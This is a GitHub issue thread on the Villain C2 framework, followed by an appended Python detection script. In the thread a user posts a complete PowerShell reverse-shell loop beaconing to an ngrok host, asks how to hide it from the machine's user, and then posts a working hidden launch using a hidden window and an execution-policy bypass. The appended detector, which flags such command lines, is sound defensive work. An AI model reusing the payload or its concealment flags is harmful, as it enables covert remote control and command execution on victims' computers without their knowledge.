t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).

Unable to make hidden shell with ngrok #17

Closed edikiuspy closed 1 year ago

edikiuspy commented 1 year ago

I followed the instructions on https://youtu.be/ubNUCvFOmwQ, but when I try to hide it like this: Start-Process $PSHOME\powershell.exe -ArgumentList {$s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}} -WindowStyle Hidden
there is no error, but I also don't get any requests on the ngrok server or sessions in Villain. But when I run this code: $s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8} everything works fine, but it is visible to the user. Is there a way to hide it?

carlos837 commented 1 year ago

you need to encode it

carlos837 commented 1 year ago

try using this tool

edikiuspy commented 1 year ago

I think I found the problem. When I execute the script, in Task Manager I see a conhost.exe open for a second, but then it closes. But how can I fix it?

edikiuspy commented 1 year ago

Solved with powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command $s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
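The launch pattern the thread settles on (a hidden PowerShell window, execution policy bypassed, an infinite polling loop that pipes fetched text into Invoke-Expression, all beaconing to an ngrok tunnel) is also exactly what a defender should be alerting on in process-creation telemetry. The following is an added example, not part of this issue or of the Villain project, that scores command lines from Sysmon Event ID 1 / Windows 4688 style records against those indicators. The event dictionaries and their field names are constructed for the example, the indicator weights and the alert threshold are my own heuristic choices, and the regexes deliberately accept PowerShell's abbreviated parameter names (for instance `-w hidden` or `-ep bypass`), since an unambiguous prefix is accepted by powershell.exe and is a common way to dodge naive string matches.

```python
import re

# Weighted indicators. PowerShell accepts any unambiguous parameter prefix, so the
# character-class forms match -w hidden, -win hidden, -WindowStyle Hidden, etc.
INDICATORS = [
    ("hidden_window",   re.compile(r"-w[indowstyle]*\s+h[idden]*\b", re.I),               2),
    ("policy_bypass",   re.compile(r"-e[xecutionpolicy]*\s+(?:bypass|unrestricted)\b", re.I), 1),
    ("invoke_expr",     re.compile(r"\biex\b|invoke-expression", re.I),                   2),
    ("web_fetch",       re.compile(r"invoke-restmethod|invoke-webrequest|downloadstring|net\.webclient", re.I), 1),
    ("tunnel_domain",   re.compile(r"ngrok(?:-free)?\.(?:io|app|dev)\b", re.I),            2),
    ("infinite_loop",   re.compile(r"for\s*\(\s*;\s*;\s*\)|while\s*\(\s*\$true\s*\)", re.I), 1),
]

ALERT_THRESHOLD = 4  # heuristic: hidden window + IEX alone is enough to look at

# Constructed sample records (assumed field names), not real telemetry. The first
# mirrors the launch pattern from the thread with the tunnel host replaced by a placeholder
# and the loop body shortened; the rest are ordinary PowerShell usage.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ("powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
                 "$s='EXAMPLE-TUNNEL.eu.ngrok.io';$p='https://';"
                 "for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b);"
                 "if ($c -ne 'None') {$r=Invoke-Expression $c}; sleep 0.8}")},
    {"pid": 5008, "parent": "svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"pid": 5112, "parent": "cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process | Where-Object {$_.CPU -gt 100}"},
    {"pid": 5200, "parent": "explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]


def score_command(cmdline):
    """Return (score, [matched indicator names]) for one command line."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            hits.append(name)
    return score, hits


def triage(events, threshold=ALERT_THRESHOLD):
    """Return the events whose command line scores at or above the threshold."""
    flagged = []
    for ev in events:
        score, hits = score_command(ev["cmdline"])
        if score >= threshold:
            flagged.append({"pid": ev["pid"], "parent": ev["parent"],
                            "score": score, "indicators": hits})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"pid {hit['pid']} (parent {hit['parent']}): score {hit['score']} "
              f"-> {', '.join(hit['indicators'])}")
```

On the sample records only the first event trips the threshold: it matches all six indicators, while the scheduled backup script scores 1 for the policy bypass alone. In a real pipeline you would feed `score_command` the CommandLine field of each event and keep the parent process, because an interactive shell launched by explorer.exe with a hidden window is a much stronger signal than the same flags under a known management agent.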